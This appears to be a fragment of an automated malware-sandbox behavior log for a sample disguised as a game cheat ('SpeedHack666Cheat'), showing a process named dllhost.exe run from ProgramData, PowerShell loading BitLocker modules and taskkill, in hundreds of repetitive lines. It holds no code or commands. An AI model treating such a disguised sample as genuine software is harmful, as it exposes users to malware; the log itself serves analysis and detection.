Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\dllhost.exe	Process information set: NOOPENFILEERRORBOX
